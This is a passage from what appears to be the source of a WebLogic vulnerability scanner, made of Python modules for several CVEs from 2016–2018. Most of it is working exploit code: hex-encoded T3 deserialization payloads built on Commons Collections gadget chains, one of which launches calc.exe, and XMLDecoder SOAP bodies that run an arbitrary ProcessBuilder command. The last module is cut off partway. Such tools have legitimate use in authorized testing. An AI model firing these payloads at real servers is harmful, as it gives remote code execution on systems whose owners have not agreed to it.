1636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
44 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
45 |             '{:04x}'.format(dport))
46 |         data3 = '1a7727000d3234322e323134'
47 |         data4 = '2e312e32353461863d1d0000000078'
48 |         for d in [data1, data2, data3, data4]:
49 |             sock.send(bytes.fromhex(d))
50 | 
51 |         # send evil object data
52 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
53 |         # -------- attack code start --------
54 |         payload += 'aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78'
55 |         # --------- attack code end ---------
56 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
57 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
58 |         sock.send(bytes.fromhex(payload))
59 |         time.sleep(delay)
60 |         try:
61 |             res = sock.recv(4096)
62 |             return b'weblogic.jms.common.StreamMessageImpl' in res, {'msg': 'finish.'}
63 |         except socket.timeout:
64 |             return False, {'msg': 'connection timeout.'}
65 | 
66 | 
67 | def run(queue: SyncManager.Queue, data: Dict):
68 |     obj = CVE_2016_0638()
69 |     result = {
70 |         'IP': data['IP'],
71 |         'PORT': data['PORT'],
72 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
73 |         'MSG': '',
74 |         'STATE': False
75 |     }
76 |     result['STATE'], result['MSG'] = obj.light_and_msg(
77 |         data['IP'], data['PORT'], data['IS_SSL'])
78 | 
79 |     queue.put(result)
80 | 


--------------------------------------------------------------------------------
/stars/cve_2016_3510.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2016-3510
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | import socket
 9 | import time
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | 
14 | from stars import target_type, Star
15 | 
16 | 
17 | # @universe.groups()
18 | class CVE_2016_3510(Star):
19 |     info = {
20 |         'NAME': '',
21 |         'CVE': 'CVE-2016-3510',
22 |         'TAG': []
23 |     }
24 |     type = target_type.VULNERABILITY
25 | 
26 |     def light_up(self, dip, dport, force_ssl=None, delay=1, timeout=5, *args, **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(bytes.fromhex(
39 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 |         time.sleep(delay)
41 |         sock.recv(1024)
42 | 
43 |         # build t3 request object
44 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
45 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
46 |             '{:04x}'.format(dport))
47 |         data3 = '1a7727000d3234322e323134'
48 |         data4 = '2e312e32353461863d1d0000000078'
49 |         for d in [data1, data2, data3, data4]:
50 |             sock.send(bytes.fromhex(d))
51 | 
52 |         # send evil object data
53 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
54 |         # -------- attack code start --------
55 |         payload += 'aced0005737200257765626c6f6769632e636f7262612e7574696c732e4d61727368616c6c65644f626a656374592161d5f3d1dbb6020002490004686173685b00086f626a42797465737400025b427870b6f794cf757200025b42acf317f8060854e0020000787000000130aced00057372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e53797374656d00000000000000000000007870'
56 |         # --------- attack code end ---------
57 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
58 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
59 |         sock.send(bytes.fromhex(payload))
60 |         time.sleep(delay)
61 |         try:
62 |             res = sock.recv(4096)
63 |             return b'org.apache.commons.collections.functors.InvokerTransformer' in res, {'msg': 'finish.'}
64 |         except socket.timeout:
65 |             return False, {'msg': 'connection timeout.'}
66 | 
67 | 
68 | def run(queue: SyncManager.Queue, data: Dict):
69 |     obj = CVE_2016_3510()
70 |     result = {
71 |         'IP': data['IP'],
72 |         'PORT': data['PORT'],
73 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
74 |         'MSG': '',
75 |         'STATE': False
76 |     }
77 |     result['STATE'], result['MSG'] = obj.light_and_msg(
78 |         data['IP'], data['PORT'], data['IS_SSL'])
79 | 
80 |     queue.put(result)
81 | 


--------------------------------------------------------------------------------
/stars/cve_2017_10271.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # 该漏洞不会直接回显
 4 | # 这里根据响应的错误内容确认是否执行成功，可能会出现错漏的情况，需人工确认
 5 | # updated 2019/10/30
 6 | # by 0xn0ne
 7 | 
 8 | from stars import target_type, Star
 9 | from utils import http
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | headers = {
14 |     'Content-Type': 'text/xml;charset=UTF-8',
15 |     'User-Agent': 'TestUA/1.0'
16 | }
17 | 
18 | 
19 | # @universe.groups()
20 | class CVE_2017_10271(Star):
21 |     info = {
22 |         'NAME': '',
23 |         'CVE': 'CVE-2017-10271',
24 |         'TAG': []
25 |     }
26 |     type = target_type.VULNERABILITY
27 | 
28 |     def light_up(self, dip, dport, force_ssl=None, cmd='whoami', *args, **kwargs) -> (bool, dict):
29 |         url = 'http://{}:{}/wls-wsat/CoordinatorPortType'.format(dip, dport)
30 |         t_data = ''
31 |         for i, c in enumerate(cmd.split()):
32 |             t_data += '<void index="{}"><string>{}</string></void>'.format(
33 |                 i, c)
34 |         data = '''
35 |     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
36 |       <soapenv:Header>
37 |         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
38 |           <java>
39 |             <void class="java.lang.ProcessBuilder">
40 |               <array class="java.lang.String" length="2">
41 |                 {}
42 |               </array>
43 |               <void method="start"/>
44 |             </void>
45 |           </java>
46 |         </work:WorkContext>
47 |       </soapenv:Header>
48 |       <soapenv:Body/>
49 |     </soapenv:Envelope>
50 |     '''.format(t_data)
51 |         res, data = http(url, 'POST', data=data, timeout=3,
52 |                          headers=headers, ssl=force_ssl)
53 |         if res != None and ('<faultstring>java.lang.ProcessBuilder' in res.text or "<faultstring>0" in res.text):
54 |             return True, {'msg': 'finish.'}
55 |         return False, {'msg': 'finish.'}
56 | 
57 | 
58 | def run(queue: SyncManager.Queue, data: Dict):
59 |     obj = CVE_2017_10271()
60 |     result = {
61 |         'IP': data['IP'],
62 |         'PORT': data['PORT'],
63 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
64 |         'MSG': '',
65 |         'STATE': False
66 |     }
67 |     result['STATE'], result['MSG'] = obj.light_and_msg(
68 |         data['IP'], data['PORT'], data['IS_SSL'])
69 | 
70 |     queue.put(result)
71 | 


--------------------------------------------------------------------------------
/stars/cve_2017_3248.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2017-3248
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | import re
 9 | import socket
10 | import time
11 | from multiprocessing.managers import SyncManager
12 | from typing import Any, Dict, List, Mapping, Tuple, Union
13 | 
14 | 
15 | from stars import target_type, Star
16 | 
17 | 
18 | # @universe.groups()
19 | class CVE_2017_3248(Star):
20 |     info = {
21 |         'NAME': '',
22 |         'CVE': 'CVE-2017-3248',
23 |         'TAG': []
24 |     }
25 |     type = target_type.VULNERABILITY
26 | 
27 |     def light_up(self, dip, dport, force_ssl=None, delay=1, timeout=5, *args, **kwargs) -> (bool, dict):
28 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
29 |         # t3 handshake
30 |         dport = int(dport)
31 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
32 |         sock.settimeout(timeout)
33 |         try:
34 |             sock.connect((dip, dport))
35 |         except socket.timeout:
36 |             return False, {'msg': 'connection timeout.'}
37 |         except ConnectionRefusedError:
38 |             return False, {'msg': 'connection refuse.'}
39 |         sock.send(bytes.fromhex(
40 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
41 |         time.sleep(delay)
42 |         sock.recv(1024)
43 | 
44 |         # build t3 request object
45 |         data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
46 |         data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
47 |             '{:04x}'.format(dport))
48 |         data3 = '1a7727000d3234322e323134'
49 |         data4 = '2e312e32353461863d1d0000000078'
50 |         for d in [data1, data2, data3, data4]:
51 |             sock.send(bytes.fromhex(d))
52 | 
53 |         # send evil object data
54 |         payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
55 |         # -------- attack code start --------
56 |         payload += 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'
57 |         # --------- attack code end ---------
58 |         payload += 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
59 |         payload = '%s%s' % ('{:08x}'.format(len(payload) // 2 + 4), payload)
60 |         sock.send(bytes.fromhex(payload))
61 |         time.sleep(delay)
62 |         try:
63 |             res = sock.recv(4096)
64 |             r = re.search(b'\\$Proxy[0-9]+', res)
65 |             return not r is None, {'msg': 'finish.'}
66 |         except socket.timeout:
67 |             return False, {'msg': 'connection timeout.'}
68 | 
69 | 
70 | def run(queue: SyncManager.Queue, data: Dict):
71 |     obj = CVE_2017_3248()
72 |     result = {
73 |         'IP': data['IP'],
74 |         'PORT': data['PORT'],
75 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
76 |         'MSG': '',
77 |         'STATE': False
78 |     }
79 |     result['STATE'], result['MSG'] = obj.light_and_msg(
80 |         data['IP'], data['PORT'], data['IS_SSL'])
81 | 
82 |     queue.put(result)
83 | 


--------------------------------------------------------------------------------
/stars/cve_2017_3506.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2017-3248
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | from stars import target_type, Star
 9 | from utils import http
10 | from multiprocessing.managers import SyncManager
11 | from typing import Any, Dict, List, Mapping, Tuple, Union
12 | 
13 | 
14 | # @universe.groups()
15 | class CVE_2017_3506(Star):
16 |     info = {
17 |         'NAME': '',
18 |         'CVE': 'CVE-2017-3506',
19 |         'TAG': []
20 |     }
21 |     type = target_type.VULNERABILITY
22 | 
23 |     def light_up(self, dip, dport, force_ssl=None, cmd='whoami', *args, **kwargs) -> (bool, dict):
24 |         url = 'http://{}:{}/wls-wsat/CoordinatorPortType'.format(dip, dport)
25 |         data = '''
26 |     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
27 |       <soapenv:Header>
28 |         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
29 |           <java>
30 |             <object class="java.lang.ProcessBuilder">
31 |               <array class="java.lang.String" length="3">
32 |                 '''
33 |         for idx, it in enumerate(cmd.split()):
34 |             data += '<void index="{}"><string>{}</string></void>'.format(
35 |                 idx, it)
36 |         data += '''
37 |               </array>
38 |               <void method="start"/>
39 |             </object>
40 |           </java>
41 |         </work:WorkContext>
42 |       </soapenv:Header>
43 |       <soapenv:Body/>
44 |     </soapenv:Envelope>'''
45 | 
46 |         headers = {'Content-Type': 'text/xml'}
47 |         res, data = http(url, 'POST', headers, data=data, ssl=force_ssl)
48 |         return res != None and ('<faultstring>java.lang.ProcessBuilder' in res.text or "<faultstring>0" in res.text), {
49 |             'msg': 'finish.'}
50 | 
51 | 
52 | def run(queue: SyncManager.Queue, data: Dict):
53 |     obj = CVE_2017_3506()
54 |     result = {
55 |         'IP': data['IP'],
56 |         'PORT': data['PORT'],
57 |         'NAME': obj.info['CVE'] if obj.info['CVE'] else obj.info['NAME'],
58 |         'MSG': '',
59 |         'STATE': False
60 |     }
61 |     result['STATE'], result['MSG'] = obj.light_and_msg(
62 |         data['IP'], data['PORT'], data['IS_SSL'])
63 | 
64 |     queue.put(result)
65 | 


--------------------------------------------------------------------------------
/stars/cve_2018_2628.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | # _*_ coding:utf-8 _*_
 3 | # CVE-2018-2628
 4 | # 该漏洞不会直接回显
 5 | # updated 2019/11/1
 6 | # by 0xn0ne
 7 | 
 8 | import re
 9 | import socket
10 | import time
11 | from multiprocessing.managers import SyncManager
12 | from typing import Any, Dict, List, Mapping, Tuple, Union
13 | 
14 | from stars import target_type, Star
15 | 
16 | 
17 | # @universe.groups()
18 | class CVE_2018_2628(Star):
19 |     info = {
20 |         'NAME': '',
21 |         'CVE': 'CVE-2018-2628',
22 |         'TAG': []
23 |     }
24 |     type = target_type.VULNERABILITY
25 | 
26 |     def light_up(self, dip, dport, force_ssl=None, delay=2, timeout=5, *args, **kwargs) -> (bool, dict):
27 |         # 对端响应数据需要一段时间，使用 delay 来控制，如果不成功，可以加到 3s 左右，超过这个基本都是打了补丁的
28 |         # t3 handshake
29 |         dport = int(dport)
30 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
31 |         sock.settimeout(timeout)
32 |         try:
33 |             sock.connect((dip, dport))
34 |         except socket.timeout:
35 |             return False, {'msg': 'connection timeout.'}
36 |         except ConnectionRefusedError:
37 |             return False, {'msg': 'connection refuse.'}
38 |         sock.send(bytes.fromhex(
39 |             '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
40 |         time.sleep(delay)
41 |         sock.recv(1024)
42 | 
43 |         # build t3 request object
